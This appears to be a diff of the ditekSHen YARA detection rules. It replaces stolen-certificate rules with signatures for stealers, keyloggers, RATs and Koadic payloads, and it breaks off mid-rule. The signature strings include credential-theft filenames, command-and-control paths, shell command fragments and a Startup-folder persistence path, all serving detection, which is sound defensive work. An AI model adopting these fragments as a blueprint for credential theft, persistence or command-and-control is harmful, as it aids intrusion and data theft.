+		clamav_sig = "MALWARE.Win.Trojan.QulabZ-Stealer"
+
+	strings:
+		$x1 = "QULAB CLIPPER + STEALER" ascii wide
+		$x2 = "MASAD CLIPPER + STEALER" ascii wide
+		$x3 = "http://teleg.run/Qulab" ascii wide
+		$x4 = "http://teleg.run/jew_seller" ascii wide
+		$x5 = "BUY CLIPPER + STEALER" ascii wide
+		$s1 = "\\Screen.jpg" ascii wide
+		$s2 = "attrib +s +h \"" ascii wide
+		$s3 = "\\x86_microsoft-windows-" ascii wide
+		$s4 = "\\amd64_microsoft-windows-" ascii wide
+		$s5 = "Desktop TXT File" ascii wide
+		$s6 = "\\AutoFills.txt" ascii wide
+		$s7 = "\\CreditCards.txt" ascii wide
+		$s8 = "a -y -mx9 -ssw" ascii wide
+		$s9 = "\\Passwords.txt" ascii wide
+		$s10 = "\\Information.txt" ascii wide
+		$s11 = "\\getMe" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kayak Republic af 2015 APS" and pe.signatures [ i ] . serial == "08:62:2b:9d:d9:d7:8e:67:67:8e:cc:21:e0:26:52:2e" )
+		9 of them or ( ( 1 of ( $x* ) and 4 of ( $s* ) ) or 1 of ( $x* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_5A17D5De74Fd8F09Df596Df3123139Bb : FILE
+rule DITEKSHEN_MALWARE_Win_Orion : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Orion Keylogger payload"
 		author = "ditekSHen"
-		id = "871d9840-4540-58d3-980e-d356c856dbca"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "b380b93b-6ceb-5244-aeca-b1f8f9a5b553"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4470-L4481"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L985-L1005"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f5ff9f7d857da3329708ba9c0bfac0999b04aeb170fb60387f4b48fa6029a641"
+		logic_hash = "9e5521ebaf9bdef6dadd2a2a093bd6f87ded023d9a74db126ac8ec9a5f1f9744"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "1da887a57dddd7376a18f75841559c9682f78b04"
-		importance = 20
+
+	strings:
+		$s1 = "\\Ranger.BrowserLogging" ascii wide nocase
+		$s2 = "GrabAccounts" fullword ascii
+		$s3 = "DownloadFile" fullword ascii
+		$s4 = "Internet Explorer Recovery" wide
+		$s5 = "Outlook Recovery" wide
+		$s6 = "Thunderbird Recovery" wide
+		$s7 = "Keylogs -" wide
+		$s8 = "WebCam_Capture.dll" wide
+		$s9 = " is not installed on this computer!" wide
+		$s10 = "cmd /c bfsvc.exe \"" wide
+		$s11 = "/Keylogs - PC:" fullword wide
+		$s12 = "/PC:" fullword wide
+		$s13 = "<p style=\"color:#CC7A00\">[" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ACTA FIS d.o.o." and pe.signatures [ i ] . serial == "5a:17:d5:de:74:fd:8f:09:df:59:6d:f3:12:31:39:bb" )
+		( uint16( 0 ) == 0x5a4d and 5 of ( $s* ) ) or ( 6 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_15Da61D7E1A631803431561674Fb9B90 : FILE
+rule DITEKSHEN_MALWARE_Win_Aspire : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Aspire Keylogger payload"
 		author = "ditekSHen"
-		id = "d1fd8200-0960-567d-9bb6-2bd1ed99f61b"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "25724975-f373-553e-b27e-43168e956c16"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4483-L4494"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1007-L1022"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4d30a4bf1b0425081369351df707be0531dcc1751512d9012a859b621d61a1b3"
+		logic_hash = "3ea0136dbacb79e4c7556f562d17b26b84ac3e4c967b117021e2399ded0a0fdf"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "9a9bc3974e3cbbabdeb2b6debdc0455586e128a4"
-		importance = 20
+
+	strings:
+		$s1 = "AspireLogger -" wide
+		$s2 = "Application: @" wide
+		$s3 = "encryptedUsername" wide
+		$s4 = "encryptedPassword" wide
+		$s5 = "Fetch users fron logins" wide
+		$s6 = "URI=file:" wide
+		$s7 = "signons.sqlite" wide
+		$s8 = "logins.json" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JAY DANCE STUDIO d.o.o." and pe.signatures [ i ] . serial == "15:da:61:d7:e1:a6:31:80:34:31:56:16:74:fb:9b:90" )
+		( uint16( 0 ) == 0x5a4d and 6 of ( $s* ) ) or ( 7 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_58Aa64564A50E8B2D6E31D5Cd6250Fde : FILE
+rule DITEKSHEN_MALWARE_Win_S05Kitty : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Sector05 Kitty RAT payload"
 		author = "ditekSHen"
-		id = "b6eff323-241a-5f11-837f-bfacdc547d89"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "3261f6b6-21e7-5195-98db-9607ba530572"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4496-L4507"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1024-L1045"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7383dfc8b22379dc69cd1d93d2da40e177ba1e3b0b8b8891afb8ce594269d170"
+		logic_hash = "df2930694671c9ca16f2afeb799704647c9acf32be118706c342347ffe8ceb36"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a7b43a5190e6a72c68e20f661f69ddc24b5a2561"
-		importance = 20
+
+	strings:
+		$s1 = "Execute Comand" ascii
+		$s2 = "InjectExplorer" ascii
+		$s3 = "targetProcess = %s" fullword ascii
+		$s4 = "Process attach (%s)" fullword ascii
+		$s5 = "process name: %s" fullword ascii
+		$s6 = "cmd /c %s >%s" fullword ascii
+		$s7 = "CmdDown: %s, failed" fullword ascii
+		$s8 = "http://%s%s/%s" fullword ascii
+		$s9 = "tmp.LOG" fullword ascii
+		$x1 = "zerodll.dll" fullword ascii
+		$x2 = "OneDll.dll" fullword ascii
+		$x3 = "kkd.bat" fullword ascii
+		$x4 = "%s\\regsvr32.exe /s \"%s\"" fullword ascii
+		$x5 = "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\fontchk.jse" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Foreground" and pe.signatures [ i ] . serial == "58:aa:64:56:4a:50:e8:b2:d6:e3:1d:5c:d6:25:0f:de" )
+		uint16( 0 ) == 0x5a4d and ( 8 of ( $s* ) or all of ( $x* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Bbd4Dc3768A51Aa2B3059C1Bad569276 : FILE
+rule DITEKSHEN_MALWARE_Win_Fakewmi : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "FakeWMI payload"
 		author = "ditekSHen"
-		id = "cb5214b4-1af5-5b31-b690-6531139e92b1"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "689bc207-2bc6-50de-80d6-d1ba0a26b264"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4509-L4520"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1047-L1064"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d506c2d6e630fabe1d4b805cd31aa54b04959db80630f656b3460c869ad544fa"
+		logic_hash = "627886cdd01f5f02e454ef284c77c87eb027ee33f6a51536758fb7f095271a40"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "36936c4aa401c3bbeb227ce5011ec3bdc02fdd14"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.Fakewmi"
+
+	strings:
+		$s1 = "-BEGIN RSA PUBLIC KEY-" ascii
+		$s2 = ".exe|" ascii
+		$s3 = "cmd /c wmic " ascii
+		$s4 = "cmd /c sc " ascii
+		$s5 = "schtasks" ascii
+		$s6 = "taskkill" ascii
+		$s7 = "findstr" ascii
+		$s8 = "netsh interface" ascii
+		$s9 = "CreateService" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JJ ELECTRICAL SERVICES LIMITED" and pe.signatures [ i ] . serial == "00:bb:d4:dc:37:68:a5:1a:a2:b3:05:9c:1b:ad:56:92:76" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) and #s2 > 10 )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_3A236F003Bdefc0C55Aa42D9C6C0B08E : FILE
+rule DITEKSHEN_MALWARE_Win_Baldr : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Baldr payload"
 		author = "ditekSHen"
-		id = "02c95d8f-f694-5d0f-bf79-b806334e8af3"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "cdc35a11-a97b-5e21-929e-01fed5172b55"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4522-L4533"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1066-L1083"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9930b2d3fdbd2f6da17d78dfbfe6229f0bd004686e4cc4960720710241237e48"
+		logic_hash = "f8e97fd618209bc6ce609b60b1e1f1e359be7678474fad3b18a529487c64cd99"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "5ba147ebae6089f99823b1640c305b337b1a4c36"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.Baldr"
+
+	strings:
+		$x1 = "BALDR VERSION : {0}" fullword wide
+		$x2 = "Baldr" fullword ascii wide
+		$x3 = "{0}\\{1:n}.exe" fullword wide
+		$x4 = ".doc;.docx;.log;.txt;" fullword wide
+		$s1 = "<GetMAC>b__" ascii
+		$s2 = "<ExtractPrivateKey3>b__" ascii
+		$s3 = "UploadData" fullword ascii
+		$s6 = "get_NetworkInterfaceType" fullword ascii
+		$s5 = "get_Passwordcheck" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Assurio" and pe.signatures [ i ] . serial == "3a:23:6f:00:3b:de:fc:0c:55:aa:42:d9:c6:c0:b0:8e" )
+		( uint16( 0 ) == 0x5a4d and all of ( $x* ) ) or ( 2 of ( $x* ) and 4 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_010000000001302693Cb45 : FILE
+rule DITEKSHEN_MALWARE_Win_Megumin : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Megumin payload"
 		author = "ditekSHen"
-		id = "0ab8e30d-dd75-5dd1-9bc8-413e59d5d310"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "bb1743f7-0bd8-5c0a-ad78-c4747904204f"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4535-L4547"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1085-L1108"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		hash = "74069d20e8b8299590420c9af2fdc8856c14d94929c285948585fc89ab2f938f"
-		logic_hash = "74c5d88012ab3e975123cde51ae3d01b6bee1ad0d6c0f5492c507fb2472b7532"
+		logic_hash = "fb4934814c45d2465b6e1589c3b489116343ca0c17ebb916b5c9247fc676c74d"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "bc5fcb5a2b5e0609e2609cff5e272330f79b2375"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.Megumin"
+
+	strings:
+		$s1 = "loadpe|" fullword ascii
+		$s2 = "Megumin/2.0" fullword ascii
+		$s3 = "/c start /I \"\" \"" fullword ascii
+		$s4 = "jsbypass|" fullword ascii
+		$cnc1 = "Mozilla/5.0 (Windows NT 6.1) Megumin/2.0" fullword ascii
+		$cnc2 = "/cdn-cgi/l/chk_jschl?s=" fullword ascii
+		$cnc3 = "/newclip?hwid=" fullword ascii
+		$cnc4 = "/isClipper" fullword ascii
+		$cnc5 = "/task?hwid=" fullword ascii
+		$cnc6 = "/completed?hwid=" fullword ascii
+		$cnc7 = "/gate?hwid=" fullword ascii
+		$cnc8 = "/addbot?hwid=" fullword ascii
+		$pdb = "\\MeguminV2\\Release\\MeguminV2.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AutoIt Consulting Ltd" and pe.signatures [ i ] . serial == "01:00:00:00:00:01:30:26:93:cb:45" )
+		( uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 5 of ( $cnc* ) or $pdb ) ) or 11 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_3F8D23C136Ae9Cbeeac7605B24Ec0391 : FILE
+rule DITEKSHEN_MALWARE_Win_Rietspoof : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Rietspoof payload"
 		author = "ditekSHen"
-		id = "86617b78-86b0-59dc-a072-cb4acecd60e1"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "b2d94705-ca59-56ae-8471-2c6895d355dc"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4565-L4576"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1110-L1140"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f074e141e07cbf6b5b4726b52faa382b8ece809804dcfb9d45a5b2450125b5b7"
+		logic_hash = "d1d9baab83c904d1e8dcd7aeacdabfc79c1acee67006793c2240a42ebf9c62b2"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "ff481ea6a887f3b5b941ff7d99a6cdf90c814c40"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.Rietspoof"
+
+	strings:
+		$c1 = "%s%s%s USER: user" fullword ascii
+		$c2 = "cmd /c %s" fullword ascii
+		$c3 = "CreateObject(\"Scripting.FileSystemObject\").DeleteFile(" ascii
+		$c4 = "WScript.Quit" fullword ascii
+		$c5 = "CPU: %s(%d)" fullword ascii
+		$c6 = "RAM: %lld Mb" fullword ascii
+		$c7 = "data.dat" fullword ascii
+		$c8 = "%s%s%s USER:" ascii
+		$v1_1 = ".vbs" ascii
+		$v1_2 = "HELLO" ascii
+		$v1_3 = "Wscript.Sleep" ascii
+		$v1_4 = "User-agent:Mozilla/5.0 (Windows; U;" ascii
+		$v2_1 = "Xjoepxt!" ascii
+		$v2_2 = "Content-MD5:%s" fullword ascii
+		$v2_3 = "M9h5an8f8zTjnyTwQVh6hYBdYsMqHiAz" fullword ascii
+		$v2_4 = "GET /%s?%s HTTP/1.1" fullword ascii
+		$v2_5 = "GET /?%s HTTP/1.1" fullword ascii
+		$pdb1 = "\\techloader\\loader\\loader.odb" ascii wide
+		$pdb2 = "\\loader\\Release\\loader_v1.0.pdb" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bandicam Company" and pe.signatures [ i ] . serial == "3f:8d:23:c1:36:ae:9c:be:ea:c7:60:5b:24:ec:03:91" )
+		uint16( 0 ) == 0x5a4d and ( 7 of ( $c* ) and ( 3 of ( $v* ) or 1 of ( $pdb* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_3972443Af922B751D7D36C10Dd313595 : FILE
+rule DITEKSHEN_MALWARE_Win_Modirat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "MoDiRAT payload"
 		author = "ditekSHen"
-		id = "21ada866-167a-54d5-a137-7720de32520e"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "8b641c7a-5ebd-50e7-83cb-e408683c456b"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4578-L4589"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1142-L1158"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "764d0a288edd3bac90c0b93319f4f8ff8a7d567cda42aa52fe6114f4e56216ad"
+		logic_hash = "d0760e9dab7e9c0affb2193ea249feea8bb58e519522ca2a562f015059ad5590"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "d89e3bd43d5d909b47a18977aa9d5ce36cee184c"
-		importance = 20
+
+	strings:
+		$s1 = "add_Connected" fullword ascii
+		$s2 = "Statconnected" fullword ascii
+		$s3 = "StartConnect" fullword ascii
+		$s4 = "TelegramTitleDetect" fullword ascii
+		$s5 = "StartTitleTelegram" fullword ascii
+		$s6 = "Check_titles" fullword ascii
+		$s7 = "\\MoDi RAT V" ascii
+		$s8 = "IsBuzy" fullword ascii
+		$s9 = "Recording_Time" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sore Loser Games ApS" and pe.signatures [ i ] . serial == "39:72:44:3a:f9:22:b7:51:d7:d3:6c:10:dd:31:35:95" )
+		( uint16( 0 ) == 0x5a4d and 7 of them ) or all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_37F3384B16D4Eef0A9B3344B50F1D8A3 : FILE
+rule DITEKSHEN_MALWARE_DOC_Koadicdoc : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Koadic post-exploitation framework document payload"
 		author = "ditekSHen"
-		id = "a7eef803-2c9e-5f23-acde-22ae2223fec2"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "76d6c8df-4e42-5c0a-8344-f8848e7ac945"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4591-L4602"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1160-L1174"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4496052ff9677e0d031471e4ae9b3541099a2dbe024b4b5ba3f757800bfdcb07"
+		logic_hash = "9f0538e1faee737a08d403a7f321ce45bdc70b390accfe378ba0d26292509fd7"
 		score = 75
-		quality = 75
+		quality = 25
 		tags = "FILE"
-		thumbprint = "3fcdcf15c35ef74dc48e1573ad1170b11a623b40"
-		importance = 20
+
+	strings:
+		$s1 = "&@cls&@set" ascii
+		$s2 = /:~\d+,1%+/ ascii
+		$s3 = "Header Char" fullword wide
+		$s4 = "EMBED Package" ascii
+		$b1 = ".bat\"%" ascii
+		$b2 = ".bat');\\\"%" ascii
+		$b3 = ".bat',%" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sore Loser Games ApS" and pe.signatures [ i ] . serial == "37:f3:38:4b:16:d4:ee:f0:a9:b3:34:4b:50:f1:d8:a3" )
+		uint16( 0 ) == 0xcfd0 and all of ( $s* ) and 2 of ( $b* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00B3969Cd6B2F913Acc99C3F61Fc14852F : FILE
+rule DITEKSHEN_MALWARE_BAT_Koadicbat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Koadic post-exploitation framework BAT payload"
 		author = "ditekSHen"
-		id = "2cd4cee3-0adc-595f-b86f-7c515cd0ea64"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "dad7bb32-b1f1-5c6d-89b2-77cc49b5f020"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4604-L4619"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1176-L1186"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4ee7f3da2ae707517c1c426e6a73fdede51514e4ddf60b93fd77c1b6c23e82c0"
+		logic_hash = "1ee6c0189a5111c61af1dbe571524427bff95a7e3907f97ce51d272a8f701cf5"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "bd9cadcfb5cde90f493a92e43f49bf99db177724"
-		hash1 = "a4d9cf67d111b79da9cb4b366400fc3ba1d5f41f71d48ca9c8bb101cb4596327"
-		importance = 20
+
+	strings:
+		$v1_1 = "&@cls&@set" ascii
+		$v2_1 = { 26 63 6c 73 0d 0a 40 25 }
+		$m1 = /:~\d+,1%+/ ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "S.O.M GmbH" and ( pe.signatures [ i ] . serial == "b3:96:9c:d6:b2:f9:13:ac:c9:9c:3f:61:fc:14:85:2f" or pe.signatures [ i ] . serial == "00:b3:96:9c:d6:b2:f9:13:ac:c9:9c:3f:61:fc:14:85:2f" ) )
+		uint16( 0 ) == 0xfeff and ( ( 1 of ( $v1* ) or 1 of ( $v2* ) ) and #m1 > 100 )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0D83E7F47189Cdbfc7Fa3E5F58882329 : FILE
+rule DITEKSHEN_MALWARE_JS_Koadicjs
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Koadic post-exploitation framework JS payload"
 		author = "ditekSHen"
-		id = "6574aab4-f307-53c2-8cf7-bcc7565facc8"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "8598d5cb-0486-52b0-a686-6bd014f35c44"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4621-L4632"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1188-L1208"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c4dffcad286e161980ccec2188459b8b7eaf0e982c7c69ca5ffbaf8e4d85d1b4"
+		logic_hash = "689116f74996fecf4c16c224e8cd842ad5b5e989de2dfdf0debeb9a26d8a12fa"
 		score = 75
 		quality = 75
-		tags = "FILE"
-		thumbprint = "ba4bf6d8caac468c92dd7cd4303cbdb2c9f58886"
-		importance = 20
+		tags = ""
+
+	strings:
+		$s1 = "window.moveTo(-" ascii
+		$s2 = "window.onerror = function(sMsg, sUrl, sLine) { return false; }" fullword ascii
+		$s3 = "window.onfocus = function() { window.blur(); }" fullword ascii
+		$s4 = "window.resizeTo(" ascii
+		$s5 = "window.blur();" fullword ascii
+		$hf1 = "<hta:application caption=\"no\" windowState=\"minimize\" showInTaskBar=\"no\"" fullword ascii
+		$hf2 = "<hta:application caption=\"no\" showInTaskBar=\"no\" windowState=\"minimize\" navigable=\"no\" scroll=\"no\""
+		$ht1 = "<hta:application" ascii
+		$ht2 = "caption=\"no\"" ascii
+		$ht3 = "showInTaskBar=\"no\"" ascii
+		$ht4 = "windowState=\"minimize\"" ascii
+		$ht5 = "navigable=\"no\"" ascii
+		$ht6 = "scroll=\"no\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE WIZARD GIFT CORPORATION" and pe.signatures [ i ] . serial == "0d:83:e7:f4:71:89:cd:bf:c7:fa:3e:5f:58:88:23:29" )
+		all of ( $s* ) and ( 1 of ( $hf* ) or all of ( $ht* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_008385684419Ab26A3F2640B1496E1Fe94 : FILE
+rule DITEKSHEN_MALWARE_Win_NETEAGLE : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "NETEAGLE backdoor payload"
 		author = "ditekSHen"
-		id = "5aa92ac6-241f-54a1-b828-f8a5deb6d212"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "89d1304a-63a0-50fc-855a-2e36cde1c5e7"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4634-L4645"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1210-L1225"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7c9de438d5c7156052e30ce70310aaa989ff1896f7b34ffc6c4fd8fc2bc60b85"
+		logic_hash = "148de0ca332d3885d94eae8d15eb4aaa2bc4950c691c0e8817c816b7d4c55510"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ee1d7d90957f3f2ccfcc069f5615a5bafdac322f"
-		importance = 20
+
+	strings:
+		$s1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" fullword ascii
+		$s2 = "System\\CurrentControlSet\\control\\ComputerName\\ComputerName" fullword ascii
+		$s3 = "Mozilla/4.0 (compatible; MSIE 5.0; Win32)" fullword ascii
+		$s4 = "/index.htm" fullword ascii
+		$s5 = "Help_ME" fullword ascii
+		$s6 = "GOTO ERROR" ascii
+		$s7 = "127.0.0.1" fullword ascii
+		$s8 = /pic\d\.bmp/ ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CAUSE FOR CHANGE LTD" and pe.signatures [ i ] . serial == "00:83:85:68:44:19:ab:26:a3:f2:64:0b:14:96:e1:fe:94" )
+		uint16( 0 ) == 0x5a4d and 7 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_1Aec3D3F752A38617C1D7A677D0B5591 : FILE
+rule DITEKSHEN_MALWARE_WIN_BACKSPACE : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "BACKSPACE backdoor payload"
 		author = "ditekSHen"
